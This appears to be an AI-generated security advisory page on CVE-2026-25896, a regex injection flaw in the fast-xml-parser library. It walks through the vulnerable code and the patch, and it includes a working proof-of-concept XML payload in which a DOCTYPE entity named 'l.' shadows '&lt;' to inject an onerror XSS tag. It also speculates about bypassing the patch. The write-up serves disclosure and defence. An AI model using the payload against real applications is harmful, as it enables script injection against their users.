CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

CVE-2026-25896
9.3

Regex Injection in fast-xml-parser: Shadowing the <

Amit Schendel
Senior Security Researcher

Feb 20, 2026 · 5 min read

PoC Available

Executive Summary (TL;DR)

User-supplied XML entity names are passed directly into `new RegExp()`. Attackers can define an entity named `l.` which creates a regex that matches `<`, allowing them to overwrite the less-than symbol with malicious HTML tags (XSS).

A critical regex injection vulnerability exists in the `fast-xml-parser` library (versions 4.1.3 to <5.3.5). The parser constructs regular expressions dynamically from untrusted DOCTYPE entity names without proper escaping. This allows attackers to define malicious entities that 'shadow' built-in XML entities like `&lt;` or `&amp;`. By replacing these safe entities with arbitrary content, attackers can bypass entity encoding and achieve Cross-Site Scripting (XSS) in downstream applications relying on the parser's output.

The Hook: Parsing at the Speed of Insecurity

XML parsing is a thankless job. It’s verbose, complicated, and prone to 'Billion Laughs' attacks. So, when a library like fast-xml-parser comes along promising high performance and low overhead, developers flock to it like moths to a flame. It is a staple in the Node.js ecosystem, used to translate the ancient language of XML into the modern comfort of JSON.

But speed often comes at the cost of correctness—or in this case, sanity. In an effort to handle custom XML entities defined in DOCTYPE blocks (those <!ENTITY ...> declarations), the library developers made a classic, fatal error: they trusted the input. Specifically, they trusted that an entity name would just be a name.

This vulnerability isn't your standard buffer overflow or logic error. It is a Regex Injection. The parser takes strings from the XML document and compiles them directly into executable Regular Expressions. If you know anything about security, you know that new RegExp(userInput) is the software equivalent of handing a loaded gun to a toddler.

The Flaw: When a Dot is Not Just a Dot

Here is the fundamental disconnect: The XML specification allows periods (.) in entity names. Regular Expressions use the period (.) as a wildcard that matches any single character (except newlines).

When fast-xml-parser encounters a DOCTYPE definition like <!ENTITY my.entity "value">, it needs a way to find and replace usages of that entity later in the document. To do this, it dynamically generates a Global Regular Expression. The logic effectively boils down to:

const regex = new RegExp('&' + entityName + ';', 'g');

See the problem? If an attacker defines an entity named `l.`, the generated regex becomes `/&l.;/g`.

In the world of regex, /&l.;/ doesn't just match the literal string &l.;. It matches &la;, &lb;, &l!;, and—crucially—&lt;. Since &lt; is the standard XML entity for the less-than character (<), this creates a collision. The parser doesn't treat &lt; as a protected keyword; it just sees text that matches the attacker's wildcard regex.
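The collision is easy to reproduce in isolation. The snippet below is a minimal sketch that mirrors the one-line construction quoted above; `buildEntityRegex` is a hypothetical helper name used for illustration, not a function from the library.

```javascript
// Hypothetical helper: builds the regex the same way as the one-liner above.
function buildEntityRegex(entityName) {
  return new RegExp('&' + entityName + ';', 'g');
}

const samples = ['&l.;', '&la;', '&l!;', '&lt;', '&gt;', '&l;'];

// A fresh regex is built per sample so the 'g' flag's lastIndex state
// cannot leak between test() calls.
const matched = samples.filter((s) => buildEntityRegex('l.').test(s));

console.log(matched); // [ '&l.;', '&la;', '&l!;', '&lt;' ]
```

Only `&gt;` and `&l;` escape the pattern: the first has no `l`, and the second has no character for the wildcard to consume.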

The Smoking Gun: Source Code Analysis

Let's look at the crime scene in src/xmlparser/DocTypeReader.js. This is where the parser reads the DTD and builds its substitution map.

Vulnerable Code (< 5.3.5):

// Inside the entity parsing loop
entities[entityName] = {
    // The fatal flaw: passing entityName directly to RegExp constructor
    regx : RegExp(`&${entityName};`, "g"),
    val: val
};

It is shockingly simple. There is no sanitization and no escaping of the entity name. RegExp.escape() only ships natively in recent JavaScript runtimes, but a hand-rolled escape function is a one-liner, so that's no excuse.

When the parser later iterates through the document to replace entities, it loops through this entities object. If the attacker's malicious regex runs before the built-in handlers (or if it simply shadows them by nature of the replacement logic), the built-in safety mechanisms are bypassed.

The logic essentially says: "Find anything looking like &l<any_char>; and replace it with the attacker's string." Since &lt; fits that description, it gets clobbered.
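To make the shadowing concrete, here is a simplified model of the substitution pass. It is a sketch under stated assumptions, not the library's code: `buildEntityTable`, `replaceEntities`, and the `builtIns` map are hypothetical names, and the ordering (DOCTYPE entities first, built-ins second) is assumed for illustration.

```javascript
// Simplified model only. Names and ordering are assumptions for illustration.
function buildEntityTable(declarations) {
  const entities = {};
  for (const [name, val] of Object.entries(declarations)) {
    // Same unescaped construction as the vulnerable snippet above.
    entities[name] = { regx: new RegExp(`&${name};`, 'g'), val };
  }
  return entities;
}

const builtIns = {
  lt: { regx: /&lt;/g, val: '<' },
  gt: { regx: /&gt;/g, val: '>' },
};

function replaceEntities(text, docTypeEntities) {
  // Assumed order: DOCTYPE-defined entities run before the built-ins.
  for (const { regx, val } of Object.values(docTypeEntities)) {
    text = text.replace(regx, val);
  }
  for (const { regx, val } of Object.values(builtIns)) {
    text = text.replace(regx, val);
  }
  return text;
}

const benign = buildEntityTable({ company: 'ACME' });
const hostile = buildEntityTable({ 'l.': '[ATTACKER]' });

console.log(replaceEntities('1 &lt; 2 at &company;', benign)); // 1 < 2 at ACME
console.log(replaceEntities('1 &lt; 2', hostile));             // 1 [ATTACKER] 2
```

In this model, by the time the built-in `&lt;` handler runs there is nothing left for it to match.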

The Exploit: Shadowing the Gods

To exploit this, we don't need memory corruption. We just need to define an entity that, when turned into a regex, matches a target we want to overwrite. The most valuable target in an XML context is &lt; because it represents the opening of a tag.

The Attack Chain:

  1. Define the Payload: We create a DOCTYPE with an entity named `l.`. The value of this entity will be our malicious HTML/JS.
  2. The Trigger: In the body of the XML, we use the standard, safe entity &lt;.
  3. The Substitution: The parser compiles /&l.;/g. It scans the text &lt;. The regex matches. The parser swaps &lt; for our payload.

Proof of Concept:

<?xml version="1.0"?>
<!DOCTYPE pwn [
  <!-- The entity name 'l.' becomes regex /&l.;/ which matches '&lt;' -->
  <!ENTITY l. "<img src=x onerror=alert('Pwned')>">
]>
<root>
  <!-- The parser sees '&lt;', matches it against /&l.;/, and injects the tag -->
  <data>Hello &lt;b&gt;World&lt;/b&gt;</data>
</root>

Result: Instead of rendering safe text like Hello <b>World</b>, the application renders: Hello <img src=x onerror=alert('Pwned')>b>World<...

The browser sees the <img> tag and executes the JavaScript.
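The sketch below replays the substitution on the PoC's text node and then shows why the sink matters. It assumes the attacker's regex runs before the built-in `&gt;` replacement; `escapeHtml` is a hypothetical helper standing in for whatever output encoding the downstream application uses.

```javascript
const payload = "<img src=x onerror=alert('Pwned')>";

// Replay of the substitution on the PoC's <data> text (assumed ordering).
const parsed = 'Hello &lt;b&gt;World&lt;/b&gt;'
  .replace(new RegExp('&l.;', 'g'), payload) // attacker's entity clobbers &lt;
  .replace(/&gt;/g, '>');                    // built-in &gt; still works

// Hypothetical output-encoding helper applied at the HTML sink.
function escapeHtml(text) {
  return text
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

console.log(parsed);             // contains a live <img ... onerror=...> tag
console.log(escapeHtml(parsed)); // same text, but inert when rendered
```

An application that writes `parsed` into the page as markup executes the handler; one that encodes at the sink renders the payload as visible text instead. That is defense in depth, not a substitute for upgrading the parser.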

The Fix (and Why It's Still Sketchy)

The maintainers released version 5.3.5 to address this. Let's look at their solution. Instead of refactoring to avoid Regex for entity replacement (the ideal solution), they opted for a blacklist/escape approach.

The Patch in 5.3.5:

// The attempt to sanitize the entity name
const escaped = entityName.replace(/[.\-+*:]/g, '\\.');
const regx = new RegExp(`&${escaped};`, "g");

> [!WARNING]
> Researcher Note: This patch is brittle.

  1. It converts everything to a dot: The code replaces . with \., which is good. But it also replaces -, +, *, and : with \., which changes the entity name inside the regex. For an entity named my-ent, the regex becomes /&my\.ent;/g, which matches &my.ent; but not &my-ent;. Exact matching breaks for names containing those characters.
  2. Incomplete Blacklist: Regex has many metacharacters. The patch misses |, ?, ^, $, (, ), [, ], {, }.
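Both effects can be checked directly against the escaping expression quoted from the patch. This is a minimal sketch; `patchedEntityRegex` is a hypothetical wrapper around those two quoted lines, not a function exported by the library.

```javascript
// Hypothetical wrapper around the two patch lines quoted above.
function patchedEntityRegex(entityName) {
  const escaped = entityName.replace(/[.\-+*:]/g, '\\.');
  return new RegExp(`&${escaped};`, 'g');
}

// The original attack is closed: the dot is now literal.
console.log(patchedEntityRegex('l.').source);               // &l\.;
console.log(patchedEntityRegex('l.').test('&lt;'));         // false

// Side effect: a hyphen in the name is rewritten to an escaped dot.
console.log(patchedEntityRegex('my-ent').source);           // &my\.ent;
console.log(patchedEntityRegex('my-ent').test('&my-ent;')); // false
console.log(patchedEntityRegex('my-ent').test('&my.ent;')); // true
```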

Re-exploitation Potential: An attacker might try to use the pipe | (OR operator). If we define an entity named lt|amp, the regex becomes /&lt|amp;/g. That is syntactically valid, but because alternation has the lowest precedence it matches either &lt or amp; instead of one whole entity reference. A clever attacker might find other combinations of unescaped characters (like the optional ? or classes []) to construct regexes that still shadow built-in entities. The "fix" is more of a band-aid than a cure.
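For contrast, here is a sketch of two sturdier approaches: escaping every regex metacharacter with the widely used character-class idiom, and skipping regex entirely with a literal split/join. All three function names are hypothetical and this is not the maintainers' fix. Whether the patched parser would even accept a name like `lt|amp` is not verified here; the snippet only shows what the regex engine does with it.

```javascript
// Common escaping idiom: backslash-prefix every regex metacharacter.
function escapeRegExp(text) {
  return text.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Hypothetical safer constructor (illustration only).
function safeEntityRegex(entityName) {
  return new RegExp(`&${escapeRegExp(entityName)};`, 'g');
}

// Regex-free alternative: literal substring replacement.
function replaceEntityLiteral(text, entityName, value) {
  return text.split(`&${entityName};`).join(value);
}

// Unescaped alternation: valid pattern, matches '&lt' OR 'amp;'.
const unescaped = new RegExp('&' + 'lt|amp' + ';', 'g');
console.log('&lt;'.match(unescaped));                // [ '&lt' ]

console.log(safeEntityRegex('lt|amp').test('&lt;')); // false
console.log(safeEntityRegex('l.').test('&lt;'));     // false
console.log(safeEntityRegex('l.').test('&l.;'));     // true
console.log(replaceEntityLiteral('a &l.; b &lt; c', 'l.', 'X')); // a X b &lt; c
```

The split/join variant has no pattern language at all, so there is nothing for a hostile name to inject into.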

Official Patches

NaturalIntelligence: Fix commit on GitHub


Technical Appendix

CVSS Score
9.3 / 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N

Affected Systems

  • Node.js applications using fast-xml-parser
  • Frontend applications bundling fast-xml-parser
  • API gateways transforming XML to JSON

Affected Versions Detail

| Product | Affected Versions | Fixed Version |
| --- | --- | --- |
| fast-xml-parser (NaturalIntelligence) | >= 4.1.3, < 5.3.5 | 5.3.5 |

| Attribute | Detail |
| --- | --- |
| CWE ID | CWE-185 (Incorrect Regular Expression) |
| CVSS Score | 9.3 (Critical) |
| Attack Vector | Network (AV:N) |
| Exploit Status | PoC Available |
| Impact | XSS / Integrity Compromise |
| Patch Quality | Partial / Brittle |
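
To triage an installed copy against the affected range listed above, a small comparison is enough. This is a minimal sketch: `compareVersions` and `isAffected` are hypothetical helpers that handle plain `major.minor.patch` strings only (no pre-release tags), and the version string itself would come from something like `npm ls fast-xml-parser`.

```javascript
// Hypothetical helper: compares plain "major.minor.patch" strings only.
function compareVersions(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// Affected range from the advisory data above: >= 4.1.3 and < 5.3.5.
function isAffected(version) {
  return compareVersions(version, '4.1.3') >= 0 &&
         compareVersions(version, '5.3.5') < 0;
}

console.log(isAffected('4.1.2')); // false
console.log(isAffected('5.3.4')); // true
console.log(isAffected('5.3.5')); // false
```

Numeric comparison per component matters here: a plain string comparison would rank 4.10.0 below 4.2.0.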

MITRE ATT&CK Mapping

  • T1190: Exploit Public-Facing Application (Initial Access)
  • T1059.007: Command and Scripting Interpreter: JavaScript (Execution)
  • CWE-185: Incorrect Regular Expression

Known Exploits & Detection

Internal Research: Constructed PoC using DOCTYPE entity 'l.' to shadow '&lt;'.

Vulnerability Timeline

  • 2026-02-08: Patch released in version 5.3.5
  • 2026-02-20: CVE-2026-25896 published

References & Sources

  • [1] GitHub Advisory GHSA-m7jm-9gc2-mpf2
